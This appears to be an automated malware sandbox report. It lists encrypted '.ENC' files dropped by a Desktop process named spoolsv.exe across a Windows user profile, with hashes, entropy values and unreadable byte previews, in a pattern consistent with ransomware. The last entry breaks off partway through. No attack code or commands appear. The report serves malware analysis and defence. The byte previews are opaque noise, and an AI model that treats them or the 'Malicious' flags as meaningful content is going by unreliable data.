                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db-wal.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Notifications\wpndatabase.db.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:@...e...........................................................

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):80
                                                                                                                                                                                                                                                      Entropy (8bit):6.012492001110315
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:Dyboib5kSBpTX9rRz0:DjitkSDTNru
                                                                                                                                                                                                                                                      MD5:4911593F44C5BD4F007125E002D4BBAA
                                                                                                                                                                                                                                                      SHA1:DFB727A41EA595230A9575008C23D43B615AFC19
                                                                                                                                                                                                                                                      SHA-256:B82BBF0013F01E6E696C7D5588B09B62F6B47BE6CA0B90AF4F043FF22BC6377F
                                                                                                                                                                                                                                                      SHA-512:1E63492E6409FCFAD19E5CF610B2919E2C906203FCAF0A0738DB8C2689091B45832EE28E70224DA7D56AB1AD6BAABBF4BD51233D0AEA29DCCDE73E0ED988C1E0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..$.o..)5k...._B..ty.?.x:6...E....]..".l....oX.g...4...<../.|]5...2$..~E...#

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\local\local\cache.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):224
                                                                                                                                                                                                                                                      Entropy (8bit):7.071492924125538
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:AA0qC5gFKyqiJXL66aahCgYSKVScPPJqaGfGaG/1n4rK8sE6H3RRqz2UoWMz1Aue:NnNdL666HccPkypmK8sE6qkWMCuDSBrn
                                                                                                                                                                                                                                                      MD5:F07B0DA057CC4016B9984B172A555369
                                                                                                                                                                                                                                                      SHA1:75FCECF24C626CE9C322B14264EA1850355D1FEA
                                                                                                                                                                                                                                                      SHA-256:F45416D2E089D78B7AAF171CC1EBE7A3F30411E960B5AAD6C23DF7C57A1221BE
                                                                                                                                                                                                                                                      SHA-512:B642DFCAA804DBA89FC8C25DAB514C52C907B271BAE1488DC21F8C23CE48E1FA38ED4BAFF0CF9CF3F8C4D41DDDCAAD3BFA4FDD81D0952A429A30AC37421EAA1A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:k.....~(!.=..V.........y.......M bL.....1u+].av..e.y.r.N......=.X..7.,.0.A.H.1...1.......+...Ja...9jj.....v...(.......w...#.D>....(.<P.....5...Qz.p..o."I>.3.\....J.L...>....P...4Yu..!....n........a;..sN..K...~.#.M..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\script.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                                                                                      Entropy (8bit):5.695159765557392
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:KdNNO3vKKM8+4BsCrxgn:IGSKMd4Bsoxgn
                                                                                                                                                                                                                                                      MD5:0A770AA42A104F5843B5ECF2874B23B4
                                                                                                                                                                                                                                                      SHA1:84BE5BB6213E1B136493208713F7A0860A36CDF8
                                                                                                                                                                                                                                                      SHA-256:ED883365069BED302E41508DB478AB02CF5FFAD15D2B6992D3C3EE8D6E276E4F
                                                                                                                                                                                                                                                      SHA-512:DC704A89468D899AEE9F88691652CC1FA9F50426D1DFEA9A6D9BBBC01F8F305441AA63E9F10314B700EB32654166F40EB4CFEE634988A2FC724843F9943FB2FF
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..=..v.....{.Re.F .....-...v#.P3.>.w.#....v..r.........o....).$

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\synchronousLookupUris.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):48
                                                                                                                                                                                                                                                      Entropy (8bit):5.418295834054493
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:FsxBOlAm53oV29b:6xBOj3o2
                                                                                                                                                                                                                                                      MD5:7501AA0E0FF2B35609EB89F78F777DE2
                                                                                                                                                                                                                                                      SHA1:1240574C1B551D4B83EB3087E1710AC2ABF74F07
                                                                                                                                                                                                                                                      SHA-256:BF208BA69B695EC3A7885426B505FA50DA201F6D95DE4D0619719B98586672B2
                                                                                                                                                                                                                                                      SHA-512:C8F54B9B3114B94AF0B674FF5355F13998D89FDA93B3D02D9918F1C0CF15AFE0E3EE83A26C3E42A7C8C961AFABAB0233132C6EF21720B11FAC2958C8F3170A10
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:..p[.Y...tiR4..*...aU.C.Ej.>..).a...........%..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\topTraffic.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):32
                                                                                                                                                                                                                                                      Entropy (8bit):4.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:cB9+zKM57jU/Jn:cB9Mx5UB
                                                                                                                                                                                                                                                      MD5:676607F2268E442D1C02236AD6105751
                                                                                                                                                                                                                                                      SHA1:874088F2082FAF784253203E3B1A11C365C51F94
                                                                                                                                                                                                                                                      SHA-256:E918E2AEECC878322BE767D410D91A69810DAE7706147EE01AD574C656C887CF
                                                                                                                                                                                                                                                      SHA-512:4BE762492C48B61914C0C13B8CB229B616857CE7217823B1DBD06F606C54F5E0288BB91F92047B4441AACD65912CCD824E6A89B3006240F651DE85DD6B42B1AE
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:W*+.@_7..$.m..V.u..>.G.b.F.y#..

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Safety\edge\remote\topTraffic_638004170464094982.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):461008
                                                                                                                                                                                                                                                      Entropy (8bit):7.999572700271299
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:12288:Vse6xF2zCPhqDA1K8lKoKv0eG8gchU30Cp4MyrAQsoC:U2zOhsA8boKse783D1yrAQu
                                                                                                                                                                                                                                                      MD5:1AAED5F3329C6A63DC77A3E6FB2002F3
                                                                                                                                                                                                                                                      SHA1:5F5D4B69AB86DD14F7C2CA6C1FDB801F3CECDA8E
                                                                                                                                                                                                                                                      SHA-256:293F17B3257BF6B4EFA21AB435AC6CE87BEE83C122F4FD54F8CEE6396D9D13E8
                                                                                                                                                                                                                                                      SHA-512:5C27BD823340CFE5F2E629E403AE045E2F01251E0D9FEC071C16601238A0F033323940EE01A0BFC8C67888A32A673F95041775F5C0AC24A79FB31A0D21D93448
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.u3..t-rS.v.M'.$...`+"[N$..H.Z..1..`.........s..{........h...m.hEd......x..tq.A.......!.4.M?..QA:..L.F.EG[.../.............Nw:..R.A...>.....6AE..L]A.)..U..d..t)3..D:.1\1w...9.n...DH|+....R<.Tu....^..e5.Ey..(ef...9Y.....%j....f..U;....n`.O.r.F...2.@EU.:]8H.Ob..n...p.(.kQ...hH..Qx..y......,d&fi..4kk.7.|..}..a,::f....Z...)..Y?..a......#5.rQ.&2.N...o.n.).*.^>.+Q).{.a....bx.V.C...6}1.);.2A.....[..$.pb."D.a.1%/.<..........n......M...R...m.Y.*o.E........kZ.Y.%...l..`...R..C.....2.1.$...#LI......9.........h..z......wtkj....5A.1.GIZ.t...]....>c[....k`aC.[."...2.....p.I.D.`...1../..+.s.G.c3;..v._...._...h.a..G%..t...C.U.........9=...k....(....4'DF.....[....h..GX|..{D.>j.......Z.._+...6.Q.WY4.J...8....Z._...Z..b.3...a`....1.~.3J?p.(..'.h@..E.....5..P4w.S..~..9G..[.8.F&C./^!U\.+.....X.....I..`l5.<.p.....w..I..e.(..in.....a./BdNX......`....:....J...._..A.....WQ.......4.k)....(!.).u)...Q.......p.!h..7.....{%A......RWB.d..z.{......G2X.....G..Er../....D.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Safety\shell\remote\script.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                                                                                      Entropy (8bit):5.90625
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:QNdzMJnd4TVtEilLBKern:qgf4TVtLJn
                                                                                                                                                                                                                                                      MD5:E8D2A1C05FA33E220F6C9724F8D766A2
                                                                                                                                                                                                                                                      SHA1:D28D8A5EBF3036DAB57B2ED571681D4263EC0E95
                                                                                                                                                                                                                                                      SHA-256:92FE014399D40327C6163149238636CF7C6C93006339354AEED4CD252E3E4315
                                                                                                                                                                                                                                                      SHA-512:7342421B553E26D8831AA4A6E8D1855B6D7640673E0351E6635AA711239ABE44F39B7DEBEC7D2C36CB72321D04F848AB9C98C3ABC4A78C28BE8069B6B056EBC7
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:~..(.rh.xoU.!.+....../.m..j....I..$....*..V7s...w?c.R.D....eN.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Shell\DefaultLayouts.xml.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):63952
                                                                                                                                                                                                                                                      Entropy (8bit):7.99722266838323
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:1536:Q5c/Xm5G9WENNT3m2iBYMI89OxZ9RUfNc8Y8UWOK5277J:Q5G9WE7zjKZfNcn3WO0et
                                                                                                                                                                                                                                                      MD5:9A80106046A67C724750053051BB58DC
                                                                                                                                                                                                                                                      SHA1:5BE885323933616EB29F7B2264A1F84098AA0AFA
                                                                                                                                                                                                                                                      SHA-256:C75ABCE68DE1DAC86915F18AC11A7735FA5267E848850113861C4B622A4E40F2
                                                                                                                                                                                                                                                      SHA-512:B474EED350A4AC458C0AD7D855BA441B60CF38D8B959AE4DC25B00504A368E8EF6657490FC803D64A3EEB4C5EC9BFAE087D61AB4624E542F457E7B7750765C22
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:..d...........q~....K. /.z^.I..f.^.....@.`.`,...Nu~f...=..H..[..g.*..4c.CE...S....d..zc.4e+/ g.g..v...ylA.Wf*....g.(~.../..py.P/.....Jc..P....<*k....7K.].?...H.Zw.X.H7VM+.Y...G...y..d.N..2.5.@..>..B..36./tT.Nx.v}...4".s0..^u@$....c._.w<..6..m...MW.d..M....#...T...fG..h....U.....O.c..~_{...>.w..n..8.j. [.I.... ._..'..p.../{.L8...s..`B...w.Kk..8..H....v.W-b......w@8....@.((...c..V.uq..6......`J.'......c.r.j..^..#.'..~....R5=.q...7.....=.m.d..,.5=.Ex....Kku7........D..e.f....,..j:..!y......\..&8.q.`...$.~eG@..).&...bv>:.2.z...8.....V.......;+..`zy..9B..c.$]3..@..".;.:..`1...'..M..rEC..B.........HGK+XXq...'F.n..I.t..u+.o..U.(3...ls|Ty..V.;.K3.......;....m.X.g....VH.f.....jx....%..R~ra....T*@.....t....6.a..e...B.....v8........I.A....n.9..y.k.T5..E.l.;......T.c.h[..F...@.../."n..3..m. ..tP#.bU.,Z..M..2..I...-....s..Jpw-*5.g.Jh.=|A..k..B..:VH.....#i......x8..V..~....LJV.mJ5P.|b...U.I.!......gr:..@..f.K.\..e.5e..._-......7p|..W..dKq...^..-.....!._SN.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG1.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\UsrClass.dat.LOG2.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WebCacheLock.dat.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Non-ISO extended-ASCII text, with no line terminators
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):16
                                                                                                                                                                                                                                                      Entropy (8bit):3.875
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:3:wn7rE:wnE
                                                                                                                                                                                                                                                      MD5:0DD2E8E1D8A34F14C6938491B88DE393
                                                                                                                                                                                                                                                      SHA1:69D0A4CCE263F2D7CEB43EC913A04D1E62F81E81
                                                                                                                                                                                                                                                      SHA-256:16058C351BE7CA0776CAAC47D44F389219130C2095CEF93C96ECD8791DA00AFE
                                                                                                                                                                                                                                                      SHA-512:70C570D951383C04AEFC362A62DA6C54F8E12730D3E3434A9A3513CD65E2305B08AB3A1546A02258E327667528D39BC6277A712C9965CC87C63486BE6F0D5DA0
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.u...1!gx>vp%g.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.chk.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):8208
                                                                                                                                                                                                                                                      Entropy (8bit):7.977087215018192
                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                      SSDEEP:192:LVrEsRnzHsqpA0z8SFCmjTnE23FGeFmcwXAarJ33em0QV3:BJzHfpFz8APjA2VzFwRJ3393
                                                                                                                                                                                                                                                      MD5:F948BFF9FBF832148B009FFA64A4DD78
                                                                                                                                                                                                                                                      SHA1:E816D32547966210BB6D0CE92581148111DDA11F
                                                                                                                                                                                                                                                      SHA-256:5F73360D08633492EF18897FE3055298FC6F21BD9CFE99BE9DCD1A435B18C1DA
                                                                                                                                                                                                                                                      SHA-512:5686023F5894DC58C7D64C27A4A1BC7E21D28F3B74AAB1C1E3B897783A5FA7D3614C6ECEA5A191CE669960EAAAB2BE86F3EEAA00FF1C48FE90D00F4D7B07413A
                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                      Preview:.J..U..6..V7...F.8..E(U.V..Z.A..4.)d.=.K..RRk..1..x......E t..p...A....4...O...p.GP.O.W.]PE...;....m!......+......1...c..#.N_......`.$f.T...I....ru.?......&.N..%Mr+4dI(...jW...6.a.5....p.......S...uG..F...Q..m......q..k.O.....m..q...j.iM.?#^.^\\...`..].a]A...w.vF....|...^$..jg.....=..+U.n.+..T.p.]IH.Ft...t.T-PupQKz.n............{.......4..,ox=wu..t....3r..S\E........`v..(%....8.......T..;9.&...1..BF.:...a......o.c.[.'..l.v..q.YC.s..:.s.C...D._.z..yJ.[.......K.Q.s...r..2@3.=...... ..z.S......v..#.....h<.N....L.e9...G.qK........s..|I((c...3........&!.^.|." am+@...W...(o.?.)s;>.:.._..}.KB.......m...4T.[.F.q._.ON.h......b..(.lu ....F .....<x.7......B=.l/.H..F..q._.,t..o.i._.x.=.,.d....z.....Q.V..J..G.1.....Y...vg.s.\.G..Ac./.Qwo......y.p..~..F...J...jo..<...O.......F..^.X.......VT..F.*...3.n...j.m....s.\....29.!;...D.`.8...L@5...q.{./..hm..+..'..yG.j`H.3...pb..kE.a.._L....AwR=.N.S....L8.e.AX].O4..Y..l.D..l..?.........2..fU..s..u'..%@...9. ^8

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01.log.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):524304
                                                                                                                                                                                                                                                      Entropy (8bit):7.999694457419089
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:12288:gnnmTb4vxt4PiIcVvMBf3auVm5brm5L/qTkc:OmH4DlIcZMx3aMm53YL/bc
                                                                                                                                                                                                                                                      MD5:6E7E9C3BA50D0645B7C718A950FCF39F
                                                                                                                                                                                                                                                      SHA1:C2FC50B003157458D9316C3FE1F6B5BFCD6751D0
                                                                                                                                                                                                                                                      SHA-256:0EEFF2F6B63B32387C62E38AA90212E325112B975477E199F4E44C628ED77E79
                                                                                                                                                                                                                                                      SHA-512:E4C648A0896071CE261AC352FC5D699B89926CEA500C01D2DB093F1090E90618927FAB887718F05B4538544493464CEB8B9C867358930FA436C53F64FD4D88A6
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:S......'.......}.u....&:i${Y..!.Q....)L.!.r.._..D..+\O.....X..7*...0.~..2...;Ew&C(.;..JF.....\....S.......w...t........).n..nU.2.:L.>.R........1....<..."..m....{......'...#l#P_.O...5...yM.71..g..>.L..L.}..M...N.6.:y~..e..GF;'.x.A.?:RI..S...,.^vs.'),.B}B.NU.T.`.a.5..Wc...-......6...I...?GA.....c....?.w;.Glh.....,...`9b...xIuJ...dP.j...*XO....X...{..`..>...=......;d+..[,L.......B...%..f=...uX......M..,..h......^..J.i.F.....B....7.......?...?#......:.b.8..jBS...E...B...@.ZR.Ne8@.s1....f.J....:.4S.....<G.?...g..]2.A.....d......N..b.....:'b1.n!...}M....z._uj.dx_?6..^.94.....'.8......k.._.8.*..mbT..%w.U0W.OsNk....H..1}....~....*...T9`}.3....D.5.Fi.,..bq..XI......"A......!...W] .....`*/....K..?A../.h..4.._....E..-Y.9.....F4Z..o5.Bt6c.bK._...]...6..*.....L.5,.!b...\Ly.v...L4............(.F&.....yTN...`{!.3.DB.r..FBm.0.....u.....<...A.z.|..%F.2....~..k.b.V.Jx.HS......^..l.w".g.8<-.u...O&.....K.........~..`o.x........4i.16nt 0VX;..u].......[....._Y3

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01res00001.jrs.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Alpha compressed COFF
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):524304
                                                                                                                                                                                                                                                      Entropy (8bit):7.99966803607522
                                                                                                                                                                                                                                                      Encrypted:true
                                                                                                                                                                                                                                                      SSDEEP:12288:ewNgpfyauqgG5H1qWe6mpnYJd73upWLYbAeXvHYx1iKGso:lNgZBuqgG5VqW0Id/LYsO01rBo
                                                                                                                                                                                                                                                      MD5:74DC998780C4DC33F14F258AEF57E0A3
                                                                                                                                                                                                                                                      SHA1:D44E327FA09DEA35C6B814C95CA575B376472DFE
                                                                                                                                                                                                                                                      SHA-256:FC41A4B89D51B6AA32326A0E7DE5F0A8D2522931A90BE053F858CFAE8CC5318A
                                                                                                                                                                                                                                                      SHA-512:56889B0D3BE7D14BFF39B6025A340E7FB39CFC871F11FDAA4FCC20E9497A70F39383C929E2844495BEE55BBBFACED0322449BA0D3931BC6ABAA0D8574A98CDBF
                                                                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                                                                      Preview:.....o.8..3...GW ..Y...... ......WV.....5.......c[9...m.N..Q..R...P.\..-U(..qX....:...........:..N.T...l..c..K6.E:+.5..p#.........,W.V.5E.....<s.a.Y..RQ...50W..of.~.#-h..JL.T....y........1.s./.......A...}.X\..._.*r}...92%..}{...^..|.X..K.......j.C.......%.1..y.I.o.8...s0).....4[.]..:......d../.|....I...p.F.:WD.u.}|.xO`.9*.K4F..@b...9..s........H_................=........^..T...z.+.N.b..e..Mm...t$b.... m..3.X.SH..E.SRd.D..d.]g^.Y.4....~b~.....E."....Xl.8.3NqP.9..@.e...+.rdc..G....X1%(.....q(...U.Q.-Bt.4.mnI...yE..x J...r:d.TM.....'6f..{g@p.....2....g.| .e&....... .i..y8l.w.....u....;.D.........jje...n..=.b...............x..>..J..n.;''...X.6.WOO.h.j.Tx0.r.q....I..^...Sw{2S.d..(.hW....."...gU..fE.'.SM.p?......gj(..Y..j...h.E...X..'.....\o6a...S...p}^"...............X.&.th:......8#e...D.....I.V$..3!i.].f.>\;.X.x........8.,,.AX......6.T...Pd....]!;J.@..}.f@QG..CS..Cb..k...v=.....7......{..c{c.......j....e+...*.W,.y...^.....'.n..l...%._..y.

                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\WebCache\V01res00002.jrs.ENC

                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\spoolsv.exe
                                                                                                                                                                                                                                                      File Type:Alpha compressed COFF
                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                      Size (bytes):524304
